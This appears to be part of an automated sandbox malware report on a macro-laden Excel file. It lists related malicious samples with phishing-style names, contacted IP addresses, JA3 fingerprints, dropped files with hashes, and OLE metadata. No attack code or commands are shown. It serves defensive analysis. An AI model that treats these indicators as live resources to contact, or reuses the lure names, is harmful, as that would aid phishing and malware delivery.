                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                  • 192.232.222.43
                                                                  abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                  • 67.20.76.71

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  7dcce5b76c8b17472d024758970a406bProduct specification.xlsxGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  statistic-482095214.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  7bYDInO.rtfGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  DHL AWB.xlsxGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  QTFsui5pLN.xlsmGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  15j1TCnOiA.xlsmGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  Purchase Agreement.docxGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  export of document 555091.xlsmGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58
                                                                  generated purchase order 6149057.xlsmGet hashmaliciousBrowse
                                                                  • 192.185.32.232
                                                                  • 192.185.39.58

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                                                                  Category:dropped
                                                                  Size (bytes):59863
                                                                  Entropy (8bit):7.99556910241083
                                                                  Encrypted:true
                                                                  SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                                                                  MD5:15775D95513782F99CDFB17E65DFCEB1
                                                                  SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                                                                  SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                                                                  SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):893
                                                                  Entropy (8bit):7.366016576663508
                                                                  Encrypted:false
                                                                  SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                  MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                  SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                  SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                  SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):326
                                                                  Entropy (8bit):3.140842466552086
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKv/C8pkQSN+SkQlPlEGYRMY9z+4KlDA3RUeSKyzkOt:H/C8phZkPlE99SNxAhUeSKO
                                                                  MD5:2214B11FF3414A39AE4E2DB8863D1B75
                                                                  SHA1:79C05ADAE452E5B6C2BD5133E61370D38B6853D8
                                                                  SHA-256:DD2D8DD405F7E62F02E860DD20D8C731D54DCA6262D22F9C10F32DC7A467669A
                                                                  SHA-512:79B6B5C470B93E6BD485A4E8D232642E22C9E4C50E96E60B1633D184BD2F7DA68829D798B9159CD75289C9E752E90C4066439C6CC3D656949A987C851A547831
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: p...... ..........Nm.G..(....................................................... ...........Y5......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.f.8.8.3.5.9.3.5.d.7.1.:.0."...
                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):252
                                                                  Entropy (8bit):2.9933344443890926
                                                                  Encrypted:false
                                                                  SSDEEP:3:kkFklXXfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5nPWlP1:kKTQE1liBAIdQZV7ulPPN
                                                                  MD5:9FA487D92BAFD8E65C00516D169499FF
                                                                  SHA1:DF0B662565ADF656921B4AC264663FEBEDF4B401
                                                                  SHA-256:C5A9A2D11F4CB15560216ADBF9F5B2E73A0AB5EFF3CBF75A63F9D2DA51EA7E29
                                                                  SHA-512:9359F243AFCA20D0DC35E422F63020B17B90C71500E2F08F62559C80B084EBFA94C3044558E737C34F8E287F7394CDEDEAA72B46FF4E9090CDFBD1BA72F43304
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: p...... ....`...y..m.G..(....................................................... .........|.j-......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.b.f.8.d.f.8.0.6.2.7.0.0."...
                                                                  C:\Users\user\AppData\Local\Temp\C6DE0000
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):81246
                                                                  Entropy (8bit):7.90647334609855
                                                                  Encrypted:false
                                                                  SSDEEP:1536:TeKmfTW8SDcn9iZtJOXAQR2KtCbuMB/yDL4D5Kzhl4AiCb/tT:TALW8SD8YZo/Uh0GUzEiV
                                                                  MD5:2BA6894A4CA6569746618B119D06FDA1
                                                                  SHA1:932A5814C3CAA3618F9515BB571F83CF5FE1B579
                                                                  SHA-256:A984D8D3FC7A242CBBAC45E819B44CC1FBF758F7550F9A1AE202FE5DF6C25778
                                                                  SHA-512:2414F91CFC97F99635E2C04F880A07920F5264ADF4C0A8D35725B80AA6E1A7C5F526284DBDC01DA8A938920134E361A195A43E245CE6E49D0CAC307BC7375A66
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: .U.n.0....?..........C....I?.&..an.0........%..h!..y...5..D.......J..e....o..$...;h....,>..?m.`Eh.-.S..9G......fV>Z..5v<........+..%p.N..-.?a%.M.n74.s..U?v.e......".Q...H.W+-Ay.l....A(...5M....#.D.!.'5..4....iD..G......B.R....PX.(..s..~..F..z.1..Ki..>.....$9L.5l$..$.X!..ubi..vo..(.$.r..!..&9.~..B<...j.P._.T....^&C.... .Q..J.../......ik.GD7e..H..{.A=&j.....{....5[....s.......}@j.......2..D.1i8..S..H.q..Qg.|H(P'.y9..........PK..........!..!.9............[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\CabE15B.tmp
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                                                                  Category:dropped
                                                                  Size (bytes):59863
                                                                  Entropy (8bit):7.99556910241083
                                                                  Encrypted:true
                                                                  SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                                                                  MD5:15775D95513782F99CDFB17E65DFCEB1
                                                                  SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                                                                  SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                                                                  SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                                                                  C:\Users\user\AppData\Local\Temp\TarE15C.tmp
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):156386
                                                                  Entropy (8bit):6.3086528024913715
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ZlI6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMyGr:ZBUJcCyZfdmoku2SL3kMnBGyA
                                                                  MD5:78CABD9F1AFFF17BB91A105CF4702188
                                                                  SHA1:52FA8144D1FC5F92DEB45E53F076BCC69F5D8CC7
                                                                  SHA-256:C7B6743B228E40B19443E471081A51041974801D325DB4ED8FD73A1A24CBD066
                                                                  SHA-512:F0BF5DFBAB47CC6A3D1BF03CEC3FDDA84537DB756DA97E6D93CF08A5C750EABDFBF7FCF7EBDFFF04326617E43F0D767E5A2B7B68C548C6D9C48F36493881F62B
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: 0..b...*.H.........b.0..b....1.0...`.H.e......0..R...+.....7.....R.0..R.0...+.....7........5XY._...210419201239Z0...+......0..R.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\0b31c0f0_by_Libranalysis.LNK
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu May 13 02:52:28 2021, mtime=Thu May 13 02:52:40 2021, atime=Thu May 13 02:52:40 2021, length=174080, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):2168
                                                                  Entropy (8bit):4.549572241967691
                                                                  Encrypted:false
                                                                  SSDEEP:48:8w/XT0jX3OE+xNV3OE6RMQh2w/XT0jX3OE+xNV3OE6RMQ/:8w/XojX3F0NV3F6RMQh2w/XojX3F0NVm
                                                                  MD5:900D4F95AF0F75EBE0168A64D97FCC1B
                                                                  SHA1:1B9D4CA04B971AD14CC6C4785EC16BD3FB55FD08
                                                                  SHA-256:7BF650D900BAF523B023206282609BCC4F5440AAE2A18469686B37D00EBFDB7A
                                                                  SHA-512:D53E625F3DC6154FBDE51C54601E314CBBC71A6B24F05893D04821201835EE38806A29F509C1C25B57A6A9C5B9A601223F8415C2654BCFDB454936AE59DEB6D1
                                                                  Malicious:false
                                                                  Preview: L..................F.... ....std.G..tx.k.G..7F.k.G...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .0B31C0~1.XLS..f......R...R..*...9&....................0.b.3.1.c.0.f.0._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop\0b31c0f0_by_Libranalysis.xls.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.0.b.3.1.c.0.f.0._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu May 13 02:52:40 2021, atime=Thu May 13 02:52:40 2021, length=16384, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):867
                                                                  Entropy (8bit):4.4897223892876905
                                                                  Encrypted:false
                                                                  SSDEEP:12:85QDLgXg/XAlCPCHaXtB8XzB/EYUX+WnicvbASbDtZ3YilMMEpxRljKQgTdJP9TK:85E/XTd6j0YeM+Dv3qRMrNru/
                                                                  MD5:F3B2D815292458A7276395A073B5245D
                                                                  SHA1:23DD825DCEFE3EF789825CCD45649329773F1915
                                                                  SHA-256:79C7C675597408D1EC8E3314AFBEA616D314F45DE2E88F0421C81EB05D1B7CD7
                                                                  SHA-512:A28FC149B8C54FF3574D009893FF4B63AF5C9B78493EBA80E10C5FD7C98B4CEAAC4CECF5E9EDE179E7624188158AC3223DB1258FDE3CDCE84430B2D8E673B03E
                                                                  Malicious:false
                                                                  Preview: L..................F...........7G..tx.k.G..tx.k.G...@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......494126..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):125
                                                                  Entropy (8bit):4.597676554025461
                                                                  Encrypted:false
                                                                  SSDEEP:3:oyBVomMNHO+GUwSLMp6lFC+GUwSLMp6lmMNHO+GUwSLMp6lv:dj6N5hNVVhNbN5hNf
                                                                  MD5:8265981D753FAFBF43275468E7E2188B
                                                                  SHA1:12D72C6725B36C6BC9B3FAD7166293AED58A11F4
                                                                  SHA-256:6FBFBA861DCD4F88342B62440ED0495047947AEC1CD6FE79676305FCEED256E3
                                                                  SHA-512:71DCCF6B7DA80459B1EE4919C43D1F0C28191666DE740EE35BA0DB80537E0EA327081CD34937189E61987D09DFB7110E73C6F4597FB4E07664158EB1E448E5EA
                                                                  Malicious:false
                                                                  Preview: Desktop.LNK=0..[xls]..0b31c0f0_by_Libranalysis.LNK=0..0b31c0f0_by_Libranalysis.LNK=0..[xls]..0b31c0f0_by_Libranalysis.LNK=0..
                                                                  C:\Users\user\Desktop\97DE0000
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                  Category:dropped
                                                                  Size (bytes):205059
                                                                  Entropy (8bit):5.644179363118584
                                                                  Encrypted:false
                                                                  SSDEEP:3072:3l8ibbSD8YNoTU90f0oPzn3buX7vrPlsrXvLp0nLIl8i5U:rbbTrTU9eTv5U
                                                                  MD5:A80675B1648FE2F61AA46F36AC713FFC
                                                                  SHA1:D2C04BF993706FBF9BBB27D880B0828ED0206F25
                                                                  SHA-256:C6BF7129680C5A4944CFC52A06983AAD8F2C3BE55F56EF8DA49B7407D45A2C72
                                                                  SHA-512:5838C7C56A4B1B6F09565FC2E88176AC387DC9B9AE33798D3DF56FDC83375085B2000B0BC27574B34F419954124A8EB3AF623E42A9D0876D9941C2EF2AEC5C08
                                                                  Malicious:false
                                                                  Preview: ........g2..........................\.p....user B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...,...8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......<...........A.r.i.a.l.1.......4...........A.r.i.a.l.1.......4...........A.r.i.a.l.1...h...8...........C.a.m.b.r.i.a.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1.......>...........A.r.i.a.l.1.......?...........A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...............

                                                                  Static File Info

                                                                  General

                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:24:11 2021, Security: 0
                                                                  Entropy (8bit):3.258986427712615
                                                                  TrID:
                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                  File name:0b31c0f0_by_Libranalysis.xls
                                                                  File size:375808
                                                                  MD5:0b31c0f0844b5541f94f915757c4ba61
                                                                  SHA1:4be1acd410a4e696278657309cd4de7874055991
                                                                  SHA256:d59102c1a562711ef640e8e278477d0b7fd460667a9e8cf20b44603cc594999a
                                                                  SHA512:ec81f13553214ec8706748c94d51b20db51ae1d01981370b395f8f651173bc8136264d818ff1eb659a6d7fcbf954d4c58be331380694cf898d796dceb618e269
                                                                  SSDEEP:3072:Q8UGHv2tt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/tbHm7H9G4l+s2k3zN4sbcN:vUGAt6Uqa5DPdG9uS9QLp4l+s+Y8
                                                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                  File Icon

                                                                  Icon Hash:e4eea286a4b4bcb4

                                                                  Static OLE Info

                                                                  General

                                                                  Document Type:OLE
                                                                  Number of OLE Files:1

                                                                  OLE File "0b31c0f0_by_Libranalysis.xls"

                                                                  Indicators

                                                                  Has Summary Info:True
                                                                  Application Name:Microsoft Excel
                                                                  Encrypted Document:False
                                                                  Contains Word Document Stream:False
                                                                  Contains Workbook/Book Stream:True
                                                                  Contains PowerPoint Document Stream:False
                                                                  Contains Visio Document Stream:False
                                                                  Contains ObjectPool Stream:
                                                                  Flash Objects Count:
                                                                  Contains VBA Macros:True

                                                                  Summary

                                                                  Code Page:1251
                                                                  Author:van-van
                                                                  Last Saved By:vi-vi
                                                                  Create Time:2006-09-16 00:00:00
                                                                  Last Saved Time:2021-05-12 07:24:11
                                                                  Creating Application:Microsoft Excel
                                                                  Security:0

                                                                  Document Summary

                                                                  Document Code Page:1251
                                                                  Thumbnail Scaling Desired:False
                                                                  Contains Dirty Links:False

                                                                  Streams

                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                  General
                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                  File Type:data
                                                                  Stream Size:4096
                                                                  Entropy:0.287037498961
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                  General
                                                                  Stream Path:\x5SummaryInformation
                                                                  File Type:data
                                                                  Stream Size:4096
                                                                  Entropy:0.290777742057
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                  Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283
                                                                  General
                                                                  Stream Path:Book
                                                                  File Type:Applesoft BASIC program data, first line number 8
                                                                  Stream Size:363283
                                                                  Entropy:3.24522262131
                                                                  Base64 Encoded:True
                                                                  Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
